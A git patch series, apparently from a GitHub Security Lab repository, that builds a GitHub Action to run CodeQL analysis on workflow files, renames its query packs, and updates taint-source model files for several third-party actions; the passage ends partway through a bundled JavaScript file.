"sha512-lF3puPwkQWGfkMClXb4k/eUT/nZKQfxinRWJrdZaJO85Dqwo/G0yOC434Jr2ojwafWJMYqFGFa5ms4jJUgujdA==", + "requires": { + "@octokit/types": "^6.0.3", + "is-plain-object": "^5.0.0", + "universal-user-agent": "^6.0.0" + } + }, + "@octokit/graphql": { + "version": "4.8.0", + "resolved": "https://registry.npmjs.org/@octokit/graphql/-/graphql-4.8.0.tgz", + "integrity": "sha512-0gv+qLSBLKF0z8TKaSKTsS39scVKF9dbMxJpj3U0vC7wjNWFuIpL/z76Qe2fiuCbDRcJSavkXsVtMS6/dtQQsg==", + "requires": { + "@octokit/request": "^5.6.0", + "@octokit/types": "^6.0.3", + "universal-user-agent": "^6.0.0" + } + }, + "@octokit/openapi-types": { + "version": "12.11.0", + "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-12.11.0.tgz", + "integrity": "sha512-VsXyi8peyRq9PqIz/tpqiL2w3w80OgVMwBHltTml3LmVvXiphgeqmY9mvBw9Wu7e0QWk/fqD37ux8yP5uVekyQ==" + }, + "@octokit/plugin-paginate-rest": { + "version": "2.21.3", + "resolved": "https://registry.npmjs.org/@octokit/plugin-paginate-rest/-/plugin-paginate-rest-2.21.3.tgz", + "integrity": "sha512-aCZTEf0y2h3OLbrgKkrfFdjRL6eSOo8komneVQJnYecAxIej7Bafor2xhuDJOIFau4pk0i/P28/XgtbyPF0ZHw==", + "requires": { + "@octokit/types": "^6.40.0" + } + }, + "@octokit/plugin-rest-endpoint-methods": { + "version": "5.16.2", + "resolved": "https://registry.npmjs.org/@octokit/plugin-rest-endpoint-methods/-/plugin-rest-endpoint-methods-5.16.2.tgz", + "integrity": "sha512-8QFz29Fg5jDuTPXVtey05BLm7OB+M8fnvE64RNegzX7U+5NUXcOcnpTIK0YfSHBg8gYd0oxIq3IZTe9SfPZiRw==", + "requires": { + "@octokit/types": "^6.39.0", + "deprecation": "^2.3.1" + } + }, + "@octokit/request": { + "version": "5.6.3", + "resolved": "https://registry.npmjs.org/@octokit/request/-/request-5.6.3.tgz", + "integrity": "sha512-bFJl0I1KVc9jYTe9tdGGpAMPy32dLBXXo1dS/YwSCTL/2nd9XeHsY616RE3HPXDVk+a+dBuzyz5YdlXwcDTr2A==", + "requires": { + "@octokit/endpoint": "^6.0.1", + "@octokit/request-error": "^2.1.0", + "@octokit/types": "^6.16.1", + "is-plain-object": "^5.0.0", + "node-fetch": "^2.6.7", + "universal-user-agent": "^6.0.0" + } + }, + "@octokit/request-error": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-2.1.0.tgz", + "integrity": "sha512-1VIvgXxs9WHSjicsRwq8PlR2LR2x6DwsJAaFgzdi0JfJoGSO8mYI/cHJQ+9FbN21aa+DrgNLnwObmyeSC8Rmpg==", + "requires": { + "@octokit/types": "^6.0.3", + "deprecation": "^2.0.0", + "once": "^1.4.0" + } + }, + "@octokit/types": { + "version": "6.41.0", + "resolved": "https://registry.npmjs.org/@octokit/types/-/types-6.41.0.tgz", + "integrity": "sha512-eJ2jbzjdijiL3B4PrSQaSjuF2sPEQPVCPzBvTHJD9Nz+9dw2SGH4K4xeQJ77YfTq5bRQ+bD8wT11JbeDPmxmGg==", + "requires": { + "@octokit/openapi-types": "^12.11.0" + } + }, + "@types/node": { + "version": "20.11.19", + "resolved": "https://registry.npmjs.org/@types/node/-/node-20.11.19.tgz", + "integrity": "sha512-7xMnVEcZFu0DikYjWOlRq7NTPETrm7teqUT2WkQjrTIkEgUyyGdWsj/Zg8bEJt5TNklzbPD1X3fqfsHw3SpapQ==", + "dev": true, + "requires": { + "undici-types": "~5.26.4" + } + }, + "@vercel/ncc": { + "version": "0.38.1", + "resolved": "https://registry.npmjs.org/@vercel/ncc/-/ncc-0.38.1.tgz", + "integrity": "sha512-IBBb+iI2NLu4VQn3Vwldyi2QwaXt5+hTyh58ggAMoCGE6DJmPvwL3KPBWcJl1m9LYPChBLE980Jw+CS4Wokqxw==", + "dev": true + }, + "before-after-hook": { + "version": "2.2.3", + "resolved": "https://registry.npmjs.org/before-after-hook/-/before-after-hook-2.2.3.tgz", + "integrity": "sha512-NzUnlZexiaH/46WDhANlyR2bXRopNg4F/zuSA3OpZnllCUgRaOF2znDioDWrmbNVsuZk6l9pMquQB38cfBZwkQ==" + }, + "deprecation": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/deprecation/-/deprecation-2.3.1.tgz", + "integrity": "sha512-xmHIy4F3scKVwMsQ4WnVaS8bHOx0DmVwRywosKhaILI0ywMDWPtBSku2HNxRvF7jtwDRsoEwYQSfbxj8b7RlJQ==" + }, + "is-plain-object": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/is-plain-object/-/is-plain-object-5.0.0.tgz", + "integrity": "sha512-VRSzKkbMm5jMDoKLbltAkFQ5Qr7VDiTFGXxYFXXowVj387GeGNOCsOH6Msy00SGZ3Fp84b1Naa1psqgcCIEP5Q==" + }, + "node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", + "requires": { + "whatwg-url": "^5.0.0" + } + }, + "once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "requires": { + "wrappy": "1" + } + }, + "prettier": { + "version": "3.2.5", + "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.2.5.tgz", + "integrity": "sha512-3/GWa9aOC0YeD7LUfvOG2NiDyhOWRvt1k+rcKhOuYnMY24iiCphgneUfJDyFXd6rZCAnuLBv6UeAULtrhT/F4A==", + "dev": true + }, + "semver": { + "version": "6.3.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", + "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==" + }, + "tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" + }, + "tunnel": { + "version": "0.0.6", + "resolved": "https://registry.npmjs.org/tunnel/-/tunnel-0.0.6.tgz", + "integrity": "sha512-1h/Lnq9yajKY2PEbBadPXj3VxsDDu844OnaAo52UVmIzIvwwtBPIuNvkjuzBlTWpfJyUbG3ez0KSBibQkj4ojg==" + }, + "typescript": { + "version": "5.3.3", + "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.3.3.tgz", + "integrity": "sha512-pXWcraxM0uxAS+tN0AG/BF2TyqmHO014Z070UsJ+pFvYuRSq8KH8DmWpnbXe0pEPDHXZV3FcAbJkijJ5oNEnWw==", + "dev": true + }, + "undici": { + "version": "5.28.3", + "resolved": "https://registry.npmjs.org/undici/-/undici-5.28.3.tgz", + "integrity": "sha512-3ItfzbrhDlINjaP0duwnNsKpDQk3acHI3gVJ1z4fmwMK31k5G9OVIAMLSIaP6w4FaGkaAkN6zaQO9LUvZ1t7VA==", + "requires": { + "@fastify/busboy": "^2.0.0" + } + }, + "undici-types": { + "version": "5.26.5", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz", + "integrity": "sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA==", + "dev": true + }, + "universal-user-agent": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/universal-user-agent/-/universal-user-agent-6.0.1.tgz", + "integrity": "sha512-yCzhz6FN2wU1NiiQRogkTQszlQSlpWaw8SvVegAc+bDxbzHgh1vX8uIe8OYyMH6DwH+sdTJsgMl36+mSMdRJIQ==" + }, + "uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==" + }, + "webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" + }, + "whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", + "requires": { + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" + } + }, + "wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" + } + } +} diff --git a/.github/action/package.json b/.github/action/package.json new file mode 100644 index 000000000000..90512a3163ca --- /dev/null +++ b/.github/action/package.json @@ -0,0 +1,48 @@ +{ + "name": "codeql-actions-action", + "version": "0.1.0", + "description": "CodeQL Pack to analyze GitHub Actions and Workflows", + "main": "dist/index.js", + "scripts": { + "bundle": "npm run format:write && npm run package", + "cli": "ts-node src/index.ts", + "ci-test": "jest", + "format:write": "prettier --write **/*.ts", + "format:check": "prettier --check **/*.ts", + "lint": "npx eslint . -c ./.github/linters/.eslintrc.yml", + "package": "ncc build src/index.ts --license licenses.txt", + "package:watch": "npm run package -- --watch", + "test": "(jest && make-coverage-badge --output-path ./badges/coverage.svg) || make-coverage-badge --output-path ./badges/coverage.svg", + "all": "npm run format:write && npm run lint && npm run test && npm run package" + }, + "repository": { + "type": "git", + "url": "git+https://github.com/GitHubSecurityLab/codeql-actions.git" + }, + "exports": { + ".": "./dist/index.js" + }, + "keywords": [ + "codeql", + "security", + "actions" + ], + "author": "Pwntester", + "license": "MIT", + "bugs": { + "url": "https://github.com/GitHubSecurityLab/codeql-actions/issues" + }, + "homepage": "https://github.com/GitHubSecurityLab/codeql-actions#readme", + "dependencies": { + "@actions/core": "^1.10.1", + "@actions/exec": "^1.1.1", + "@actions/github": "^5.1.1", + "@actions/tool-cache": "^2.0.1" + }, + "devDependencies": { + "@types/node": "^20.6.0", + "@vercel/ncc": "^0.38.0", + "prettier": "^3.0.3", + "typescript": "^5.2.2" + } +} diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts new file mode 100644 index 000000000000..eeeef401a528 --- /dev/null +++ b/.github/action/src/codeql.ts @@ -0,0 +1,158 @@ +import * as fs from "fs"; +import * as path from "path"; + +import * as core from "@actions/core"; +import * as toolcache from "@actions/tool-cache"; +import * as github from "@actions/github"; +import * as toolrunner from "@actions/exec/lib/toolrunner"; + +export interface CodeQLConfig { + // The path to the codeql bundle. + path: string; + // The language to use for analysis. + language: string; + // CodeQL pack to use for analysis. + pack: string; + // The codeql suite to use for analysis. + suite: string; + // The source root to use for analysis. + source_root?: string; + // The output file for the SARIF file. + output?: string; +} + +export async function newCodeQL(): Promise { + return { + language: "yaml", + path: await findCodeQL(), + pack: "GitHubSecurityLab/actions-queries", + suite: "codeql-suites/actions-code-scanning.qls", + source_root: core.getInput("source-root"), + output: core.getInput("sarif"), + }; +} + +export async function runCommand( + config: CodeQLConfig, + args: string[], +): Promise { + var bin = path.join(config.path, "codeql"); + let output = ""; + var options = { + listeners: { + stdout: (data: Buffer) => { + output += data.toString(); + }, + }, + }; + + await new toolrunner.ToolRunner(bin, args, options).exec(); + core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); + + return output.trim(); +} + +export async function runCommandJson( + config: CodeQLConfig, + args: string[], +): Promise { + return JSON.parse(await runCommand(config, args)); +} +async function findCodeQL(): Promise { + // check if codeql is in the toolcache + var codeqlPath = await findCodeQlInToolcache(); + if (codeqlPath !== undefined) { + return codeqlPath; + } + // default to the codeql in the path + return "codeql"; +} + +async function findCodeQlInToolcache(): Promise { + const candidates = toolcache + .findAllVersions("CodeQL") + .map((version) => ({ + folder: toolcache.find("CodeQL", version), + version, + })) + .filter(({ folder }) => fs.existsSync(path.join(folder, "pinned-version"))); + + if (candidates.length === 1) { + const candidate = candidates[0]; + core.info(`CodeQL tools found in toolcache: '${candidate.folder}'.`); + core.debug(`CodeQL toolcache version: '${candidate.version}'.`); + + return path.join(candidate.folder, "codeql"); + } + + core.warning(`No CodeQL tools found in toolcache.`); + + return undefined; +} + +export async function downloadPack(codeql: CodeQLConfig): Promise { + try { + await runCommand(codeql, ["pack", "download", codeql.pack]); + return true; + } catch (error) { + core.warning("Failed to download pack from GitHub..."); + } + return false; +} + +export async function codeqlDatabaseCreate( + codeql: CodeQLConfig, +): Promise { + // get runner temp directory for database + var temp = process.env["RUNNER_TEMP"]; + if (temp === undefined) { + temp = "/tmp"; + } + var database_path = path.join(temp, "codeql-actions-db"); + var source_root = + codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; + + await runCommand(codeql, [ + "database", + "create", + "--language", + codeql.language, + "--source-root", + source_root, + database_path, + ]); + + return database_path; +} + +export async function codeqlDatabaseAnalyze( + codeql: CodeQLConfig, + database_path: string, +): Promise { + var codeql_output = codeql.output || "codeql-actions.sarif"; + + var cmd = [ + "database", + "analyze", + "--format", + "sarif-latest", + "--sarif-add-query-help", + "--output", + codeql_output, + ]; + + // remote pack or local pack + if (codeql.pack.startsWith("GitHubSecurityLab/")) { + var suite = codeql.pack + ":" + codeql.suite; + } else { + // assume path + var suite = path.join(codeql.pack, codeql.suite); + cmd.push("--search-path", codeql.pack); + } + + cmd.push(database_path, suite); + + await runCommand(codeql, cmd); + + return codeql_output; +} diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts new file mode 100644 index 000000000000..b1a4fc80c644 --- /dev/null +++ b/.github/action/src/index.ts @@ -0,0 +1,61 @@ +import * as path from "path"; +import * as core from "@actions/core"; +import * as cql from "./codeql"; + +/** + * The main function for the action. + * @returns {Promise} Resolves when the action is complete. + */ +export async function run(): Promise { + try { + // set up codeql + var codeql = await cql.newCodeQL(); + + core.debug(`CodeQL CLI found at '${codeql.path}'`); + + await cql.runCommand(codeql, ["version", "--format", "terse"]); + + // check yaml support + var languages = await cql.runCommandJson(codeql, [ + "resolve", + "languages", + "--format", + "json", + ]); + + if (!languages.hasOwnProperty("yaml")) { + core.setFailed("CodeQL Yaml extractor not installed"); + throw new Error("CodeQL Yaml extractor not installed"); + } + + // download pack + core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); + var pack_downloaded = await cql.downloadPack(codeql); + + if (pack_downloaded === false) { + var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); + codeql.pack = path.join(action_path, "ql", "src"); + + core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); + } else { + core.info(`Pack downloaded '${codeql.pack}'`); + } + + core.info("Creating CodeQL database..."); + var database_path = await cql.codeqlDatabaseCreate(codeql); + + core.info("Running CodeQL analysis..."); + var sarif = await cql.codeqlDatabaseAnalyze(codeql, database_path); + + core.info(`SARIF results: '${sarif}'`); + core.setOutput("sarif", sarif); + + core.info("Finished CodeQL analysis"); + } catch (error) { + // Fail the workflow run if an error occurs + if (error instanceof Error) core.setFailed(error.message); + } +} + +// eslint-disable-next-line @typescript-eslint/no-floating-promises +run(); diff --git a/.github/action/tsconfig.json b/.github/action/tsconfig.json new file mode 100644 index 000000000000..c4b7762f9cd2 --- /dev/null +++ b/.github/action/tsconfig.json @@ -0,0 +1,24 @@ +{ + "$schema": "https://json.schemastore.org/tsconfig", + "compilerOptions": { + "target": "ES2022", + "module": "NodeNext", + "rootDir": "./src", + "moduleResolution": "NodeNext", + "baseUrl": "./", + "sourceMap": true, + "outDir": "./dist", + "noImplicitAny": true, + "esModuleInterop": true, + "forceConsistentCasingInFileNames": true, + "strict": true, + "skipLibCheck": true, + "newLine": "lf" + }, + "exclude": [ + "./dist", + "./node_modules", + "./__tests__", + "./coverage" + ] +} diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml new file mode 100644 index 000000000000..7380ae46d07c --- /dev/null +++ b/.github/workflows/build.yml @@ -0,0 +1,30 @@ +name: Build and Compile Action + +on: + pull_request: + branches: ["master", "develop"] + workflow_dispatch: + +permissions: + contents: read + packages: read + pull-requests: read + +jobs: + action: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - uses: dorny/paths-filter@4512585405083f25c027a35db413c2b3b9006d50 + id: changes + with: + filters: | + src: + - '.github/action/**' + - 'action.yml' + + - name: Run action + if: steps.changes.outputs.src == 'true' + uses: ./ + with: + extractor-version: latest diff --git a/action.yml b/action.yml new file mode 100644 index 000000000000..03054c195be9 --- /dev/null +++ b/action.yml @@ -0,0 +1,19 @@ +name: "codeql-actions" +description: "CodeQL Pack for GitHub Actions and Workflows" + +inputs: + token: + description: GitHub Token + default: ${{ github.token }} + + source-root: + description: "Path of the root source code directory, relative to $GITHUB_WORKSPACE." + default: "./" + + sarif: + description: "SARIF File Output" + default: "codeql-actions.sarif" + +runs: + using: "node16" + main: ".github/action/dist/index.js" diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 8cf5ba69354f..dc4daebaac84 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -1,7 +1,7 @@ --- library: true warnOnImplicitThis: true -name: codeql/actions-all +name: GitHubSecurityLab/actions-all version: 0.0.1-dev dependencies: codeql/controlflow: ^0.1.7 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index f4c43168664a..919a244b3905 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,6 +1,6 @@ --- library: false -name: codeql/actions-queries +name: GitHubSecurityLab/actions-queries version: 0.0.1 groups: - actions From cf4ab41df2eeb5131a64ec2faadf4832dbfb7635 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 12:32:48 +0100 Subject: [PATCH 038/707] feat(action): rename qlpacks to use githubsecuritylab prefix --- .github/action/dist/index.js | 2 +- .github/action/src/codeql.ts | 2 +- ql/lib/qlpack.yml | 2 +- .../codeql-suites/actions-code-scanning.qls | 19 +++++++++++++++++++ ql/src/qlpack.yml | 2 +- 5 files changed, 23 insertions(+), 4 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index e13da63ecdad..23c035881624 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28606,7 +28606,7 @@ async function newCodeQL() { return { language: "yaml", path: await findCodeQL(), - pack: "GitHubSecurityLab/actions-queries", + pack: "githubsecuritylab/actions-queries", suite: "codeql-suites/actions-code-scanning.qls", source_root: core.getInput("source-root"), output: core.getInput("sarif"), diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index eeeef401a528..3826737a0824 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -25,7 +25,7 @@ export async function newCodeQL(): Promise { return { language: "yaml", path: await findCodeQL(), - pack: "GitHubSecurityLab/actions-queries", + pack: "githubsecuritylab/actions-queries", suite: "codeql-suites/actions-code-scanning.qls", source_root: core.getInput("source-root"), output: core.getInput("sarif"), diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index dc4daebaac84..1ccfae0b2781 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -1,7 +1,7 @@ --- library: true warnOnImplicitThis: true -name: GitHubSecurityLab/actions-all +name: githubsecuritylab/actions-all version: 0.0.1-dev dependencies: codeql/controlflow: ^0.1.7 diff --git a/ql/src/codeql-suites/actions-code-scanning.qls b/ql/src/codeql-suites/actions-code-scanning.qls index e69de29bb2d1..7d6c94e0c8c8 100644 --- a/ql/src/codeql-suites/actions-code-scanning.qls +++ b/ql/src/codeql-suites/actions-code-scanning.qls @@ -0,0 +1,19 @@ +- description: Standard Code Scanning queries for Actions +- queries: . + +- include: + kind: + - problem + - path-problem + tags contain: + - security + - maintainability + +- include: + kind: + - diagnostic + +- exclude: + tags contain: + - experimental + - testing diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 919a244b3905..fb5d29fb9577 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,6 +1,6 @@ --- library: false -name: GitHubSecurityLab/actions-queries +name: githubsecuritylab/actions-queries version: 0.0.1 groups: - actions From 5d1264d3a4beef372fa972e068a95b9393429a6d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 12:56:06 +0100 Subject: [PATCH 039/707] feat(action): update references to qlpacks --- .gitignore | 2 ++ ql/lib/ext/PLACEHOLDER.model.yml | 2 +- ql/lib/ext/ahmadnassri_action-changed-files.model.yml | 2 +- ql/lib/ext/dorny_paths-filter.model.yml | 2 +- ql/lib/ext/frabert_replace-string-action.model.yml | 2 +- ql/lib/ext/jitterbit_get-changed-files.model.yml | 4 ++-- ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml | 2 +- ql/lib/ext/tj-actions_changed-files.model.yml | 4 ++-- ql/lib/ext/tj-actions_verify-changed-files.model.yml | 2 +- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 11 files changed, 14 insertions(+), 12 deletions(-) diff --git a/.gitignore b/.gitignore index 1233930f4a4f..e147f87bf723 100644 --- a/.gitignore +++ b/.gitignore @@ -1,2 +1,4 @@ .DS_Store **/*.testproj +ql/lib/.codeql/ +ql/src/.codeql/ diff --git a/ql/lib/ext/PLACEHOLDER.model.yml b/ql/lib/ext/PLACEHOLDER.model.yml index ef916067967d..2f549573a533 100644 --- a/ql/lib/ext/PLACEHOLDER.model.yml +++ b/ql/lib/ext/PLACEHOLDER.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sinkModel data: - ["","","",""] diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index 3308967eebc1..8f449f6b26db 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request", "PR changed files"] diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml index d2b2ed48fc5f..6ee41e93826c 100644 --- a/ql/lib/ext/dorny_paths-filter.model.yml +++ b/ql/lib/ext/dorny_paths-filter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["dorny/paths-filter", "*", "output.changes", "pull_request", "PR changed files"] diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml index 79fd5c76e4ae..760b7cd46e72 100644 --- a/ql/lib/ext/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/frabert_replace-string-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index bc7344eedca6..f19a2da37f5e 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["jitterbit/get-changed-files", "*", "output.all", "pull_request", "PR changed files"] @@ -16,4 +16,4 @@ extensions: - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request_target", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request_target", "PR changed files"] \ No newline at end of file + - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index 332527813a41..bddfb8e67fa7 100644 --- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint"] diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index b3b8baed7fc0..fc5557db6ea9 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["tj-actions/changed-files", "*", "output.added_files", "pull_request", "PR changed files"] @@ -36,4 +36,4 @@ extensions: - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"] - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] \ No newline at end of file + - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml index 408abfbb8d0c..76d83bd249e1 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request", "PR changed files"] diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 1ccfae0b2781..3c344549245a 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.1-dev +version: 0.0.1 dependencies: codeql/controlflow: ^0.1.7 codeql/yaml: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index fb5d29fb9577..346079df9842 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -9,6 +9,6 @@ suites: codeql-suites extractor: yaml defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: - codeql/actions-all: ${workspace} + githubsecuritylab/actions-all: ${workspace} warnOnImplicitThis: true tests: test From 959a974c8b848176a6c2416f93afb4ab370761d5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 13:32:05 +0100 Subject: [PATCH 040/707] feat(action): clone pack (not use the registry) --- .github/action/dist/index.js | 83 +++++++++++++++++++++++++++++++++++- .github/action/src/codeql.ts | 1 - .github/action/src/gh.ts | 54 +++++++++++++++++++++++ .github/action/src/index.ts | 13 +++++- 4 files changed, 148 insertions(+), 3 deletions(-) create mode 100644 .github/action/src/gh.ts diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 23c035881624..9c0a19375f43 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28716,6 +28716,79 @@ async function codeqlDatabaseAnalyze(codeql, database_path) { exports.codeqlDatabaseAnalyze = codeqlDatabaseAnalyze; +/***/ }), + +/***/ 1772: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + var desc = Object.getOwnPropertyDescriptor(m, k); + if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { + desc = { enumerable: true, get: function() { return m[k]; } }; + } + Object.defineProperty(o, k2, desc); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, 